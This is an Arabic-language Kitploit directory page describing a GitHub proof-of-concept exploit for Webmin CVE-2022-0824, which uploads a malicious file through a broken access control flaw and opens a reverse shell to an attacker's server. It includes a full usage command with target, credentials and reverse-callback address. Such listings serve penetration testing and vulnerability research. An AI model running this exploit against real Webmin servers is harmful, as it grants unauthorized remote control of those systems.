Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
golang-webmin-CVE-2022-0824-revshell — إثبات المفهوم للاستغلال لـ CVE-2022-0824 | Kitploit
أدوات/GitHubGitHub/pizza-power/golang-webmin-cve-2022-0824-revshell
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubpizza-power/golang-webmin-cve-2022-0824-revshell

golang-webmin-CVE-2022-0824-revshell

إثبات المفهوم للاستغلال لـ CVE-2022-0824

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
31منذ 3 سنواتلم تتم المراجعة بعد
مشاركة

golang-webmin-CVE-2022-0824-revshell

RCE في Webmin <= 1.984

CVE-2022-0824 و CVE-2022-0829

يستغل هذا ثغرة BAC في Webmin لرفع ملف ضار، وتغيير صلاحيات الملف، وتنفيذ الملف. الملف، الذي تم إنشاؤه في الدالة makePayload، هو شل عكسي يعود إلى خادم يتحكم به المهاجم.

الاستخدام

go run cve-2022-0824.go -t "https://172.16.177.132:10000" -c "username:password" -sl 172.16.177.1:8999 -s 172.16.177.1 -p 4444

t -> عنوان الهدف
c -> بيانات الدخول لـ Webmin
sl -> عنوان IP للخادم المحلي والمنفذ لاستضافة الحمولة
s -> عنوان IP للاستدعاء العكسي
p -> منفذ الاستدعاء العكسي

المراجع

https://www.webmin.com/security.html
https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/
https://nvd.nist.gov/vuln/detail/CVE-2022-0824

تنزيل الأداة